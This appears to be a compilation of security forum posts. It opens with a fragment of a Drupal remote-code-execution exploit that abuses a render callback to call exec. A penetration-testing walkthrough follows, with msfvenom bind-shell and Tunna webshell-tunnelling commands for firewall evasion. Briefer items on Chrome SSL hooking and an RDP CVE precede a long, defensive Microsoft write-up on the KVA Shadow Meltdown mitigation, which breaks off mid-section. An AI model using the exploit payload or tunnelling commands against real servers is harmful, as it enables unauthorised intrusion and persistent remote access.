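        ("mail[#post_render][]", "exec"),    # render callback abused for RCE
    ]
    lines = []
    for name, value in fields:
        lines += [
            "--" + boundary,
            'Content-Disposition: form-data; name="%s"' % name,
            "",
            value,
        ]
    lines.append("--" + boundary + "--")
    return boundary, "\r\n".join(lines) + "\r\n"
```

The injection works because Drupal's Form API renders mail[#markup] through the attacker-chosen #post_render callback (exec), so the "command" field ends up passed straight to exec().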
-
Interactive bindshell over HTTP

By Kevin
April 18, 2018

Primitives needed

- Webshell on a webserver

Intro

What do you do when you have exploited a webserver and really want an interactive shell, but the network has zero open ports and the only way in is through HTTP port 80 on the webserver you’ve exploited? The answer is simple: tunnel your traffic inside HTTP using the existing webserver.

We have had this issue before and used some messy solutions, and sometimes just had an open port by luck. Therefore we wanted a more generic approach that could be reused every time we have a webshell. We started writing our tool called webtunfwd, which did what we wanted. It listened on a local port on our attacking machine, and when we connected to the local port, it would POST whatever was inside socket.recv to the webserver. The webserver would then take whatever was sent inside this POST request and feed it into the socket connection on the victim.

Note: The diagram below is taken from the Tunna project’s github

So this is a little walkthrough on what happens:

- Attacker uploads webtunfwd.php to the victim, which is now placed at victim:80/webtunfwd.php
- Attacker uploads his malware and/or a meterpreter bindshell which listens on localhost:20000
- Victim is now listening on localhost:20000
- Attacker calls webtunfwd.php?broker, which connects to localhost:20000 and keeps the connection open
- webtunfwd.php?broker reads from the socket and writes to a tempfile we’ll call out.tmp
- webtunfwd.php?broker reads from a tempfile we’ll call in.tmp and writes it to the socket

Great. Now we have webtunfwd.php?broker, which handles the socket connection on the victim side and keeps it open forever. We now need to write and read from the two files in.tmp and out.tmp respectively, down to our attacking machine.
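To see why the file-based relay gives a full duplex channel, here is a toy Python simulation of one broker iteration. The FakeSocket stands in for the broker's open TCP connection to the bind shell on localhost:20000; the file names mirror the in.tmp/out.tmp convention from the write-up, but the pump logic is my own sketch, not webtunfwd's actual PHP:

```python
class FakeSocket:
    """Stand-in for the broker's open connection to the backdoor."""
    def __init__(self, canned_reply=b""):
        self.received = b""
        self.reply = canned_reply

    def send(self, data):
        self.received += data

    def recv(self):
        data, self.reply = self.reply, b""
        return data

def broker_pump(sock, in_path, out_path):
    # in.tmp -> socket: forward whatever the attacker POSTed up
    with open(in_path, "rb") as f:
        pending = f.read()
    if pending:
        sock.send(pending)
        open(in_path, "wb").close()  # truncate once consumed
    # socket -> out.tmp: buffer whatever the shell produced for the next GET
    data = sock.recv()
    if data:
        with open(out_path, "ab") as f:
            f.write(data)
```

A real broker would run this pump in a loop over an actual socket; the attacker side then just has to POST into in.tmp and GET out of out.tmp to complete the tunnel.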
This is handled by our python script local.py:

- Attacker runs local.py on his machine, which listens on port localhost:11337
- Attacker now connects with the meterpreter client to localhost:11337
- When local.py receives the connection it creates 2 threads, one for reading and one for writing
- The read thread reads from the socket and writes to in.tmp by creating a POST request with the data to webtunfwd.php?write
- The write thread reads from out.tmp by creating a GET request to webtunfwd.php?read and writes the data to the socket

So with this code we now have dynamic port forwarding through HTTP, and we can run whatever payload on the server we want. But after writing this tool we searched google a little and found that a tool called Tunna was written for this exact purpose by a company called SECFORCE. So instead of reinventing the wheel by posting our own tool that didn’t get nearly as much love as the Tunna project did, we’re going to show how Tunna is used in action with a bind shell.

Systems setup

- Victim -> Windows 2012 server
- Attacker -> Some Linux distro

Prerequisites

- Ability to upload a shell to a webserver

Setting up Tunna

The first thing we need to do in order to set up Tunna is to clone the git repository. On the attacking machine run:

git clone https://github.com/SECFORCE/Tunna

In this project we have quite some files. The ones we are going to use are proxy.py and the contents of webshells. In order for Tunna to work, we are first going to upload the webshell that will handle the proxy connection/port forwarding to the victim machine. In the webshells folder you’ll find conn.aspx - use whatever method or vulnerability you are exploiting to get it onto the machine. For now we’re going to assume that the shell conn.aspx is placed at http://victim.com/conn.aspx

Tunna is now set up and ready to use.

Generating a payload

We’re now going to generate our backdoor, which is a simple shell via metasploit.
The shell is going to listen on localhost:12000, which could be any port on localhost, as we'll connect to it through Tunna. As we want to run our shell on a Windows server running ASPX, we build our backdoor in ASPX format with MSFVENOM. We use the following command:

msfvenom --platform Windows -a x64 -p windows/x64/shell/bind_tcp LPORT=12000 LHOST=127.0.0.1 -f aspx --out shell.aspx

--platform - Target platform
-a - Target architecture
-p - Payload to use
LPORT - The port to listen on, on the target
LHOST - The IP where we are listening
-f - The output format of the payload
--out - Where to save the file

After running this command we should have shell.aspx. In the same way that we uploaded conn.aspx, we upload shell.aspx. So now we assume that you have the following two files available:
http://victim.com/conn.aspx
http://victim.com/shell.aspx

Launching the attack
So everything is set up: Tunna is uploaded to the server and we have our backdoor ready. The first thing we do is visit http://victim.com/shell.aspx. After running netstat -na on the victim, we can see that our shell is listening on port 12000. Now we go to our attacking machine. We need two things for connecting: the first is proxy.py from Tunna, and the next is our Metasploit console. First we forward the local port 10000 to port 12000 on the remote host with the following command:

python proxy.py -u http://victim.com/conn.aspx -l 10000 -r 12000 -v --no-socks

-u - The target URL with the path to the uploaded webshell
-l - The local port to listen on, on the attacking machine
-r - The remote port to connect to, on the victim machine
-v - Verbosity
--no-socks - Do not create a SOCKS proxy.
Only port forwarding is needed. The output will look like the following while it awaits connections. The attacking machine now listens locally on port 10000, and we can connect to it through Metasploit. In order to do this we configure Metasploit the following way, and after that is done we enter run. We should now get a shell. The Tunna status terminal will look like this:

Conclusions
A full TCP connection wrapped in HTTP in order to evade strict firewalls and the like. We could have exchanged our normal shell for anything we wanted, as Tunna simply forwards the port for us.

Performance suggestions for projects like Tunna
We've experimented with some performance upgrades to the Tunna project. One thing we did not like was the number of HTTP GET/POST requests sent to and from the server. Our solution was to use Transfer-Encoding: chunked. This enabled us to open a GET request, receive bytes whenever they were ready, and then wait for the next read from the socket without ever closing the GET request. We researched many ways to do the same over POST, towards the server, but we couldn't seem to circumvent the internal buffering that web servers like Apache apply to received chunks, which was set to 8192 bytes.

Source: http://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/
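The chunked-streaming idea can be illustrated with a tiny parser for the Transfer-Encoding: chunked wire format. This standalone sketch (ours, not from Tunna) shows how payload bytes can be peeled off a long-lived response incrementally, one chunk at a time, without the connection ever being closed between reads:

```python
import io


def iter_chunks(stream):
    """Yield each payload chunk of a Transfer-Encoding: chunked body,
    read from a binary file-like object, stopping at the zero-length
    terminator chunk."""
    while True:
        size_line = stream.readline().strip()
        if not size_line:
            break  # EOF / malformed stream
        size = int(size_line.split(b";")[0], 16)  # size may carry extensions
        if size == 0:
            break
        data = stream.read(size)
        stream.readline()  # consume the CRLF trailing the chunk data
        yield data


body = io.BytesIO(b"5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n")
print(b"".join(iter_chunks(body)))  # b'hello world'
```

Against a live socket, each yield corresponds to one socket.recv on the server side being flushed down the still-open GET response.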
Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
Hooking Chrome’s SSL functions
ON 26 FEBRUARY 2018 BY NYTROSECURITY

The purpose of NetRipper is to capture functions that encrypt or decrypt data and send them through the network. This can be easily achieved for applications such as Firefox, where it is enough to find two DLL-exported functions, PR_Read and PR_Write, but it is far more difficult for Google Chrome, where the SSL_Read and SSL_Write functions are not exported. The main problem for someone who wants to intercept such calls is that we cannot easily find the functions inside the huge chrome.dll file, so we have to find them manually in the binary. But how can we do it?

Chrome’s source code
In order to achieve our goal, the best starting point might be Chrome’s source code. We can find it here: https://cs.chromium.org/ . It allows us to easily search and navigate through the source code.

Full article: https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/
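Since SSL_Read and SSL_Write are not exported, a tool like NetRipper has to locate them by scanning chrome.dll for known instruction byte patterns. The sketch below (our simplification, not NetRipper's actual code) shows the core idea: a signature search where some bytes, such as embedded addresses that change between builds, are wildcards:

```python
def find_pattern(data, pattern):
    """Return the offset of the first match of `pattern` in `data`.
    `pattern` is a sequence of ints (exact byte values) and None
    (wildcard, e.g. for relocated addresses); returns -1 if no match."""
    plen = len(pattern)
    for base in range(len(data) - plen + 1):
        if all(p is None or data[base + i] == p
               for i, p in enumerate(pattern)):
            return base
    return -1


# Toy example: match a "push rbp; mov rbp, rsp" prologue, then any
# 4 bytes (a hypothetical embedded address), then "ret".
code = bytes.fromhex("9090554889e5deadbeefc3")
sig = [0x55, 0x48, 0x89, 0xE5, None, None, None, None, 0xC3]
print(find_pattern(code, sig))  # 2
```

In practice the signatures are taken from a disassembler session against a known chrome.dll build, and the matched offset is where the hook is installed.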
Nginx 1.13.10 Accept-Encoding Line Feed Injection Exploit
Nytro replied to KRONZY.'s topic in Exploituri
1. Stack-based buffer overflow
2. What is the result of this exploit?
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/ -
From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886]

In the March 2018 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability that was discovered by Preempt. This vulnerability can be classified as a logical remote code execution (RCE) vulnerability. It consists of a design flaw in CredSSP, a Security Support Provider involved in Microsoft Remote Desktop and Windows Remote Management (including PowerShell sessions). An attacker with complete man-in-the-middle (MITM) control over such a session can abuse it to run arbitrary code on the target server on behalf of the user! This vulnerability affects all Windows versions. Download this white paper to learn:
- How Preempt researchers found the vulnerability
- How we were able to exploit authentication in MS-RDP
- What you need to do to protect your organization
Download now.

Source: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
KVA Shadow: Mitigating Meltdown on Windows
swiat, March 23, 2018

On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow, which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”). KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post.

Vulnerability description & background
The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode code.
Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architectural state of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time. Out-of-order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or may otherwise have left additional traces of their execution in the processor’s caches. This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory.

Operating system implications
Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode.
A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. 
This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. 
On a historical note, some operating systems have previously implemented similar mechanisms for a variety of different and unrelated reasons. For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel in order to provide a 4GB virtual address space to user mode, and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels.

KVA shadow implementation in the Windows kernel
While the design requirements of KVA shadow may seem relatively innocuous (privileged kernel-mode memory must not be mapped into the address space when untrusted user mode code runs), the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes maintainability of code in both KVA shadow and non-KVA-shadow configurations.
This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures, due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling. Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation.

The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode.

Trap handling and system service call dispatching overview and retrospective
As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors: traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load on a ring transition to ring 0 (kernel mode) code.
This field is traditionally updated by the kernel on context switch, and several other related internal events; when a switch to a different thread occurs, the processor KTSS64.Rsp0 field is updated to point to the base of the new thread’s kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread’s stack. The exception to this rule is that of system service calls, which typically enter the kernel with a “syscall” instruction; this instruction does not switch the stack pointer, and it is the responsibility of the operating system trap handling code to manually load an appropriate kernel stack pointer. On typical kernel entry, the hardware has already pushed what is termed a “machine frame” (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags of the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread.

KVA shadow trap and system service call dispatching design considerations
With a basic understanding of how traps are handled without KVA shadow, let’s dive into the details of the KVA shadow-specific considerations of trap handling in the kernel.
When designing KVA shadow, several design considerations applied for trap handling when KVA shadow was active: namely, that the security requirements were met, that performance impact on the system was minimized, and that changes to the trap handling code were kept as compartmentalized as possible in order to simplify code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel’s trap handling facilities in the future. When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only transition kernel pages that can be permitted to exist (or be “shadowed into”) in the user address space are those that hold contents that are “safe” to disclose to user mode. The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS).
This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel’s trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required. The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor, the first of which represents the stack used for “normal” kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not use all 7 possible IST stacks presently). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields point to the n-th KTRANSITION_STACK for that processor. For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, that the current stack is both shadowed into the user mode address space, and does not contain sensitive memory contents that would be risky to disclose to user mode. 
However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow, in order to avoid any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode are already executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below).

Fielding a trap with KVA shadow active
Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur prior to the normal trap handling code in the kernel being invoked for a kernel entry trap event. In addition, a similar set of tasks related to KVA shadow must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur:

1. The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor.
2. The processor’s address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only “safe” contents maintains a copy of the current processor’s kernel CR3 value for easy access by the KVA shadow trap dispatch code. Context switches between address spaces, and process attach/detach, update the corresponding KPRCB fields with the new CR3 value on process address space changes.
3. The machine frame previously pushed by hardware as part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack to the per-kernel-thread stack for the current thread.
4. The current stack must be switched to the per-kernel-thread stack.

At this point, the “normal” trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded). Roughly speaking, the inverse sequence of events must occur on normal kernel exit: the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode.

System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly specially, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame need be copied on kernel entry and kernel exit, but the other basic steps must still be performed. Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault trap events, because these events may interrupt even normally uninterruptible code. This means that they could even interrupt the normally uninterruptible KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event.
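The kernel entry and exit sequences are exact mirrors of each other, and the invariant is that the transition stack only ever holds the hardware-pushed machine frame, never any other kernel data. This toy model (ours; the real trap dispatch is hand-written assembly, and the field names here are invented for illustration) walks through both directions:

```python
def kernel_entry(cpu, thread):
    """Model the KVA shadow kernel-entry steps."""
    cpu["gs_base"] = "kernel"                # 1. load kernel GS base
    cpu["cr3"] = cpu["kprcb_kernel_cr3"]     # 2. switch to the kernel address space
    frame = cpu["transition_stack"].pop()    # 3. copy the machine frame to the
    thread["kernel_stack"].append(frame)     #    per-thread kernel stack
    cpu["rsp"] = thread["kernel_stack"]      # 4. switch stacks


def kernel_exit(cpu, thread, user_cr3):
    """The inverse sequence on return to user mode."""
    frame = thread["kernel_stack"].pop()
    cpu["transition_stack"].append(frame)
    cpu["rsp"] = cpu["transition_stack"]
    cpu["cr3"] = user_cr3
    cpu["gs_base"] = "user"


cpu = {"gs_base": "user", "cr3": "user_cr3",
       "kprcb_kernel_cr3": "kernel_cr3",
       "transition_stack": [{"rip": 0x1000, "rsp": 0x7FFF0000}],
       "rsp": None}
thread = {"kernel_stack": []}
kernel_entry(cpu, thread)
assert cpu["cr3"] == "kernel_cr3" and thread["kernel_stack"]
kernel_exit(cpu, thread, "user_cr3")
assert cpu["transition_stack"] and not thread["kernel_stack"]
```

Note how, in the model as in the real kernel, nothing but the machine frame ever lands on the transition stack.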
These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state due to the indeterminate state of the machine at the time in which these events may occur, and must preserve the pre-existing GS base or CR3 values. At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel’s .text code section, and it is desirable to minimize the amount of code that needs be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image. Note that one implication of this design choice is that KVA shadow does not protect against attacks against kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers), and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code. 
Memory management considerations for KVA shadow
Now that KVA shadow is able to handle trap entry and trap exit, it’s necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces, share the same underlying physical pages in both address spaces, and are considered nonpageable and treated as though they have been locked into memory. The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process’s kernel address space top level page directory page to the process’s user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead correspond only to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity.
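The top-level replication rule can be modeled concretely: an x64 PML4 has 512 entries, the low 256 covering user-mode VAs and the high 256 covering kernel VAs, and only the user half is mirrored into the shadow address space. A small simulation of that bookkeeping (ours, with made-up entry values):

```python
USER_HALF = range(0, 256)  # PML4 indices covering user-mode VAs


def set_top_level_entry(kernel_pml4, user_pml4, index, value):
    """Write a top-level entry, replicating user-half entries into the
    shadow user address space; kernel-half entries stay unreplicated."""
    kernel_pml4[index] = value
    if index in USER_HALF:
        user_pml4[index] = value


kernel_pml4 = [0] * 512
user_pml4 = [0] * 512
set_top_level_entry(kernel_pml4, user_pml4, 5, 0xABC)    # user half: mirrored
set_top_level_entry(kernel_pml4, user_pml4, 400, 0xDEF)  # kernel half: not mirrored
print(user_pml4[5], user_pml4[400])  # 2748 0
```

The same split explains the access-bit handling described above: because a user-half entry lives in two tables, working-set aging must OR the access bits from both copies together, and must clear them in both.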
In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel stacks.) Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces as they occur, and access bit handling for working set aging and other purposes must logically OR together the access bits from both the user and kernel address spaces if a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory pages if a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge cases where top-level page directory pages are manipulated. Finally, no general purpose kernel allocations can be marked as “global” in their corresponding leaf page table entries by the kernel, because processors susceptible to rogue data cache load cannot be allowed to observe any cached virtual address translations for privileged kernel pages that could contain sensitive memory contents while in user mode, for KVA shadow protections to be effective, and such global entries would still be cached in the processor translation buffer (TB) across an address space switch.

Booting is just the beginning of a journey
At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow.
However, there’s much more involved beyond just trap handling and memory management: for example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base. So far, we have only touched on the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We’re far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we’ll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates that address rogue data cache load.

Performance optimizations
One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory.
Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system’s page table hierarchy if the requisite translation is already cached in the processor TB. Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages. KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load. 
Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation, but several techniques have been developed to substantially reduce the cost.

PCID acceleration

